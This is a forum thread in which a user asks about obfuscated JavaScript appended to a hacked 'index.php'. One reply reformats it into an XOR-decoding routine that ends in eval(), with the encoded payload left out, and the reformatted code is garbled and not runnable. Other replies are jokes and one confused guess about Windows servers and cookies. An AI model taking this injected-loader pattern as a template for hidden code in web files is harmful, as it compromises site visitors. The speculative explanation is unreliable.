hlp

This code is from hacked "index.php":

hex-->str

what is it? security hole in javascript???

 

To the uninitiated, this may look as if it's merely a whole fucking bunch of numbers ... to me, on the other hand, even a brief glimpse reveals that what we have here is an obscenely large sequence of arbitrary digits. Umm ... I'll get my coat ...

 

Here's the same thing reformatted for improved readability:

(comments are mine)

Code:

// this is the function that gets called way below
function iqxZEA( ozusYD )
{
	// but this function doesn't seem to get called anywhere
	function ooGfjX( cqtQ )
	{
		var gDYXQE = 0;
		var mDkzD = cqtQ.length;
		var gBWab = 0;
		
		while ( gBWab < ( ozusYD.length ); hyCi++ )
		{
			var qeGhc = bwvWN( kDlr, qQHQfN) ^ bwvWN( dPWDR, qWbD );
			var oHIjVl = bwvWN( ozusYD, hyCi );
			qWbD++;
			qQHQfN++;
			
			if( qWbD > dPWDR.length )
				qWbD=0;
				
			if( qQHQfN > kDlr.length )
				qQHQfN=0 ;
				
			pUOpGD += String.fromCharCode( oHIjVl ^ qeGhc );
		}
		
		
		// weird ... what's the space doing between the p and the UOpGD?
		// if it wasn't there, the variable name would match the pUOpGD
		// in the lines above and below
		eval( p UOpGD );
		
		return pUOpGD = new String();
	}
	
	catch( e )
	{
	
	}
}



// Ridiculously long byte string argument omitted because it fucks up formatting.
iqxZEA('...');

Beats me!

P.S. I know f*** all about JavaScript.

 

ROFL hahahahahahahahahahahha

BEST FUCKIN' POST THIS YEAR ANT!

 

Yes, it looks like nonsence for me too... but why?
I'll check other files...

btw: I don't know JS

 

why?

 

Maybe it's supposed to distract inquisitive minds like you from the REAL security hole. Trust no one ...

 

I am paranoid like hell

 

I can confirm that, cause I am hell.

 

I am paranoid like Fucketeer

 

You're a cute winker.

 

How DARE you insult Funtom like that??

 

Where did you find it?

 

why? do you know answers to my questions?

 

why:
because knowing where it came could help in finding out how to read it.

do you know answers to my questions:

how many questions do you have?

 

As i wrote, it's from normal "index.php", the file is without changes, only this code was appended to the end.

 

I am far from an expert. I'm no software person.

My guess is:

You're working on a website and the server uses Windows/Microsoft. Some of those servers have problems with php and sometimes html conflicts with certain characters in the text.
Sometimes there are code keys installed as a cookie so one time viewer get the proper translation of those php characters that have no meaning within the html.
When cookies are not accepted the whole thing fails or locks-up.

Again, that's my wild guess. I'm sorry I can't give it more time to investigate for you.
Good luck!

 

you've been hacked by the /b/ ... deal with it